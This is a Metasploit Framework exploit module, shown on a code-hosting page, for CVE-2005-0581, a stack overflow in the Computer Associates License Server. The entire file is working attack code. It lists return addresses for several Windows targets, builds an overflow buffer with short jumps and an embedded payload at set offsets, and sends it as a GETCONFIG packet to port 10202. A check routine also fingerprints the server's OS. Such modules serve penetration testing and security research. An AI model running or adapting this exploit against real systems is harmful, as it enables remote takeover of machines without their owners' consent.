Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/license/calicserv_getconfig.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Computer Associates License Server GETCONFIG Overflow',

16
        'Description'	=> %q{

17
          This module exploits an vulnerability in the CA License Server

18
          network service. By sending an excessively long GETCONFIG

19
          packet the stack may be overwritten.

20
        },

21
        'Author' => [

22
          'hdm', # original msf v2 module

23
          'aushack', # msf v3 port :)

24
        ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2005-0581' ],

28
          [ 'OSVDB', '14389' ],

29
          [ 'BID', '12705' ],

30
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],

31
        ],

32
        'Privileged' => true,

33
        'DefaultOptions' => {

34
          'EXITFUNC' => 'process',

35
        },

36
        'Payload' => {

37
          'Space'	=> 600,

38
          'BadChars' => "\x00\x20",

39
          'StackAdjustment' => -3500,

40


41
        },

42
        'Platform'	=> 'win',

43
        'Targets' => [

44
          # As much as I would like to return back to the DLL or EXE,

45
          # all of those modules have a leading NULL in the

46
          # loaded @ address :(

47
          # name, jmp esi, writable, jmp edi

48
          # ['Automatic', {} ],

49
          #

50
          # aushack - tested OK Windows XP English SP0-1 only 20100214

51
          ['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi

52
          ['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi

53
          ['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi

54
          ['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi

55
        ],

56
        'DisclosureDate' => '2005-03-02',

57
        'Notes' => {

58
          'Reliability' => UNKNOWN_RELIABILITY,

59
          'Stability' => UNKNOWN_STABILITY,

60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

61
        }

62
      )

63
    )

64


65
    register_options(

66
      [

67
        Opt::RPORT(10202),

68
      ]

69
    )

70
  end

71


72
  def check

73
    connect

74
    banner = sock.get_once

75
    sock.put("A0 GETCONFIG SELF 0<EOM>")

76
    res = sock.get_once || ''

77
    disconnect

78
    if (res =~ /OS\<([^\>]+)/)

79
      vprint_status("CA License Server reports OS: #{$1}")

80
      return Exploit::CheckCode::Detected

81
    end

82
    return Exploit::CheckCode::Safe

83
  end

84


85
  def exploit

86
    connect

87
    banner = sock.get_once

88
    if (banner !~ /GETCONFIG/)

89
      print_status("The server did not return the expected greeting!")

90
    end

91


92
    # exploits two different versions at once >:-)

93
    # 144 -> return address of esi points to string middle

94
    # 196 -> return address of edi points to string beginning

95
    # 148 -> avoid exception by patching with writable address

96
    # 928 -> seh handler (not useful under XP SP2)

97
    buff = rand_text_alphanumeric(900)

98
    buff[142, 2] = Rex::Arch::X86.jmp_short(8)	# jmp over addresses

99
    buff[144, 4] = [target['Rets'][0]].pack('V')	# jmp esi

100
    buff[148, 4] = [target['Rets'][1]].pack('V')	# writable address

101
    buff[194, 2] = Rex::Arch::X86.jmp_short(4)	# jmp over address

102
    buff[196, 4] = [target['Rets'][2]].pack('V')	# jmp edi

103
    buff[272, payload.encoded.length] = payload.encoded

104


105
    sploit = "A0 GETCONFIG SELF #{buff}<EOM>"

106
    sock.put(sploit)

107


108
    handler

109
    disconnect

110
  end

111
end

112


113
=begin

114
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>

115
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

116
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

117
=end

118


119